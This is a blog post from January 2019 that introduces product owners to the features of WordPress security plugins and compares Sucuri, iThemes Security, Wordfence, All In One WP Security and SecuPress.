4 Jan 2019 - Ian Lebbern

The Product Owner's Guide To WordPress Security Plugins


If you’re a product owner who’s been handed responsibility for your company’s WordPress site, or sites, you know you have quite a bit to handle. New pages to create, new blog posts to write, and just the work of keeping things up and running. You’re also responsible for the security of the site.

WordPress has seen its fair share of security issues over the years, which may make security for your WordPress site seem like a big challenge. Thankfully, it doesn’t have to be. We’re here to help you figure out the best way to secure your WordPress site.

Security plugins for WordPress have increased, each with excellent features that make securing your site much easier than trying to figure it out yourself. Let’s look at what features you should consider when shopping for a WordPress security plugin.

What Does a Good WordPress Security Plugin Look Like?

The best security plugins for WordPress share many features. Here’s what to look for when shopping for a plugin that will help you establish security best practices for your site.

Protecting the Admin Features

The administrator dashboard of a WordPress site is a juicy target for attackers. The best plugins protect this area by enforcing strong passwords and detecting when attackers are randomly trying passwords to try to break in, known as a brute-force attack. It’s also important to change the default URL for the admin login to make sure attackers can’t easily find it.

Malware Detection

Attackers often try to add malicious code, known as “malware,” to your WordPress site without your knowledge. This extra code can open up your servers to attack or allow attackers to change the content on your site. Malware detection is a must, since running someone else’s code on your servers is extremely dangerous. The best plugins can scan automatically for malware on a schedule, although they often require you to upgrade to a paid version of the plugin to do so.

File Change Detection

A common avenue of attack is changing the core files responsible for the operation of your WordPress site. If this code is changed, it will allow an attacker to operate without being detected. It can open up back doors in your site and changes the fundamental way your site works. The best plugins scan the core WordPress files to see if they’ve been changed without your knowledge.

Security Alerts

If something bad does happen to your site, alerts are essential so your team can fight back and remove the threat. Email alerts can be configured for many plugins so you know if an attack could be in progress.

IP Address Blocking

An IP address is a computer’s unique “address” on the Internet. Many security plugins block addresses of known bad computers and some can even block entire countries. Think of this functionality as blocking those annoying spam callers on your cell phone. When you block a number, your cell provider won’t allow the blocked number through to your phone. When an IP address is blocked, your security plugin won’t allow connections from the blocked computers through to your site.

Database Backup

Your database contains user accounts and all of your plugins and content. Many security plugins offer automatic database backups so if your database is corrupted or wiped out, your site can be restored quickly from the backup. Make sure your data is kept safe against the worst case scenario by keeping it backed up.

Two-Factor Authentication

Two-factor authentication (2FA) refers to the practice of requiring multiple types of login information to gain access to a site. When your bank sends you a code in a text message that you type into a form after you enter your password, you’re using 2FA. The best security plugins will allow you to turn 2FA on for your admin dashboard. This ensures only those who really are authorized can make changes to your site. It also means that if an attacker were to guess the password to your admin dashboard, they still wouldn’t get in without the second piece of the login.

These are the basic features that many of the best plugins share. Let’s now look at what each plugin offers that may be unique.

Comparing The Best WordPress Security Plugins

WordPress security plugins are numerous. We’ve compiled a list of the best ones for you to consider so you don’t have to wade through the noise. Let’s see what sets them apart.

Sucuri Security

Sucuri Security has a WordPress plugin that helps websites prevent attacks, detect attacks, and clean up the mess after an attack.

Sucuri’s plugin hardens your WordPress site against attack. Hardening is a term used to describe applying preventative measures to increase security in the places of your site attackers are most likely to attack.

One of the great features of Sucuri that sets it apart is the ability to help your site recover from an attack if the worst were to happen. If you’re site is hacked, the Sucuri plugin will:

  1. Reset your security keys to help re-encrypt your data
  2. Generates new random passwords for user accounts that may have been compromised
  3. Reset and re-install plugins that may have been infected with malware
  4. Shows you all plugins and themes that should be updated

Sucuri thinks of your site before and after the hack, giving it the feel of a security partner, not just a vendor with a plugin.

iThemes Security

iThemes Security’s plugin features many of the basic requirements. It also has the added feature of performing a security check on your site upon installation. This lets you know how well your site is protected right now and what steps you can take to make it more secure.

Some other nice features of iThemes Security is the away mode and 404 detection. Away mode allows you to lock down your admin login so the WordPress dashboard is not available 24 hours a day. If you don’t make changes throughout the day, you can set the times when people are allowed to login.

The number “404” refers to the error code given when a page doesn’t exist. If these errors are occurring more often than normal, it’s an indication that a malicious program could be trying to crawl through your site to find your admin dashboard or other vulnerable pieces. 404 detection will automatically block the offending IP addresses.

Wordfence Security

Wordfence Security’s plugin acts as a firewall for your WordPress site. A firewall is a piece of software that inspects the network traffic coming into your site and rejects anything that appears to be an attack. Instead of using another service, Wordfence wants you to use their firewall that is built just for WordPress.

firewall diagra

Wordfence works by running its code before all other code on your site when a new request comes in. Once the request is deemed safe, the plugin hands it off to the core WordPress code for processing. If an attack is suspected, the request is blocked, logged, and an alert is sent. This functionality works as a “bouncer” for your site that thoroughly checks visitors for malicious activities before letting them into your site.

All In One WP Security & Firewall

All In One WordPress Security & Firewall is a plugin with many of the same features we’ve discussed. What sets All In One apart from the others are the usability features it holds.

The dashboards and visuals included in All In One is a great way to quickly learn the status of your site’s security. The security strength meter shows you a score based on how many recommended features you’ve activated on your site.

security pie chart

One of the challenges of securing a WordPress site is making sure security changes don’t interfere with the functionality or availability of your site. All In One labels its suggested security fixes as “basic”, “intermediate”, and “advanced”. These labels help you to progressively increase the security of your site without breaking it. You start with the basic changes to prevent the most common attacks, then slowly ramp up to the intermediate and advanced changes when you and your development team are ready. You can use your strength gauge to help you decide where to go next.

Making security user friendly is a huge help in convincing users to secure their sites. All In One’s focus on making security changes easier and less risky is a big plus.


SecuPress includes many features that we’ve discussed. They also have many unique features, some free, some requiring an upgrade to the Pro version.

One great free feature of SecuPress is protection of your security keys. SecuPress will generate keys when they are needed to prevent them from being stored on a file in your site for attackers to find.

Another useful feature, a part of the Pro version offering, is the ability to detect themes and plugins that may be vulnerable, such as being an older version, or have been tampered with to include malicious code. Many attackers start by trying to find ways to compromise plugins your site may be using. SecuPress will detect any attempts to invade your site through your plugins and warn you. Then you can reset and re-install the plugins that may have been compromised.

SecuPress also helps site owners understand where their site could be vulnerable. The firewall functionality also scans your site’s URLs and other settings to make sure you’re not putting the site at risk with poor configuration practices. Running scans such as these can be a great way to find “low-hanging fruit” and fix it.

The Right Security Plugin Makes All the Difference

Securing your WordPress site is very important in today’s environment. You can’t let your guard down, but you can’t ignore important content or feature development. These plugins are user friendly and feature rich and are all good choices. Make the best choice for your site so you can reap the great benefits of the powerful WordPress platform.

We hope we’ve helped in guiding you toward the best options and why may work for you. If you need help finding the right plugin for your needs, please don’t hesitate to get in touch.

Schedule a Consultation